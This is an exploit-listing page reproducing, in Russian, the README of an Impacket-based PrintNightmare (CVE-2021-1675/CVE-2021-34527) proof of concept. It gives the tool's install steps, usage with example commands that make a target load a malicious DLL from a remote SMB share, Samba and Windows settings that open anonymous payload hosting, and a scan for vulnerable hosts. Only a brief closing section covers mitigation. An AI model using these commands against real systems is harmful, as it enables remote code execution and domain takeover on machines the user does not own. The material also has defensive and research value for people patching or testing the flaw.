Sploitus

Exploit for CVE-2022-26809 CVE-2021-1675 CVE-2021-34527 CVE-2022-26809

kitploit · 2026-08-25

Exploit Code

MARKDOWN131 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-AUDUONGXUAN-CVE-2022-26809
# CVE-2021-1675 / CVE-2021-34527

Реализация Impacket для PoC PrintNightmare , изначально созданная Zhiniang Peng (@edwardzpeng) и Xuefeng Li (@lxf02942370)

Протестировано на полностью пропатченном контроллере домена 2019

Выполнение вредоносных DLL удаленно или локально

![](https://assets.kitploit.com/production/public/readmes/22939/8c0b705b5f1a5bc28223414f695ee4676f4169ccd0a8fa9c171abc777bfcf78b.png)

### Обновление патча

Microsoft выпустила патч для смягчения этих атак, но если на машине присутствуют следующие значения, она всё ещё будет уязвима

root@kitploit:~
    
    
    REG QUERY "HKLM\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint"
    
    HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint
        RestrictDriverInstallationToAdministrators    REG_DWORD    0x0
        NoWarningNoElevationOnInstall    REG_DWORD    0x1
    

### Установка

Перед запуском эксплойта необходимо установить мою версию Impacket, после этого всё будет хорошо

root@kitploit:~
    
    
    pip3 uninstall impacket
    git clone https://github.com/cube0x0/impacket
    cd impacket
    python3 ./setup.py install
    

### CVE-2021-1675.py

root@kitploit:~
    
    
    usage: CVE-2021-1675.py [-h] [-hashes LMHASH:NTHASH] [-target-ip ip address] [-port [destination port]] target share
    
    CVE-2021-1675 implementation.
    
    positional arguments:
      target                [[domain/]username[:password]@]<targetName or address>
      share                 Path to DLL. Example '\\10.10.10.10\share\evil.dll'
    
    optional arguments:
      -h, --help            show this help message and exit
    
    authentication:
      -hashes LMHASH:NTHASH
                            NTLM hashes, format is LMHASH:NTHASH
    
    connection:
      -target-ip ip address
                            IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name
                            and you cannot resolve it
      -port [destination port]
                            Destination port to connect to SMB Server
    
    Example;
    ./CVE-2021-1675.py hackit.local/domain_user:some-email@example.com '\\192.168.1.215\smb\addCube.dll'
    ./CVE-2021-1675.py hackit.local/domain_user:some-email@example.com 'C:\addCube.dll'
    

### Конфигурация SMB

Самый простой способ разместить полезные нагрузки — использовать samba и изменить `/etc/samba/smb.conf `, чтобы разрешить анонимный доступ

root@kitploit:~
    
    
    [global]
        map to guest = Bad User
        server role = standalone server
        usershare allow guests = yes
        idmap config * : backend = tdb
        smb ports = 445
    
    [smb]
        comment = Samba
        path = /tmp/
        guest ok = yes
        read only = no
        browsable = yes
        force user = smbuser
    

Из Windows это также возможно

root@kitploit:~
    
    
    mkdir C:\share
    icacls C:\share\ /T /grant Anonymous` logon:r
    icacls C:\share\ /T /grant Everyone:r
    New-SmbShare -Path C:\share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone'
    REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f #This will overwrite existing NullSessionPipes
    REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionShares /t REG_MULTI_SZ /d share /f
    REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f
    REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f
    # Перезагрузка
    

### Сканирование

Мы можем использовать `rpcdump.py` из impacket для сканирования потенциально уязвимых хостов; если он возвращает значение, хост может быть уязвим

root@kitploit:~
    
    
    rpcdump.py @192.168.1.10 | egrep 'MS-RPRN|MS-PAR'
    
    Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol 
    Protocol: [MS-RPRN]: Print System Remote Protocol
    

### Смягчение

Отключите службу Spooler

root@kitploit:~
    
    
    Stop-Service Spooler
    REG ADD  "HKLM\SYSTEM\CurrentControlSet\Services\Spooler"  /v "Start" /t REG_DWORD /d "4" /f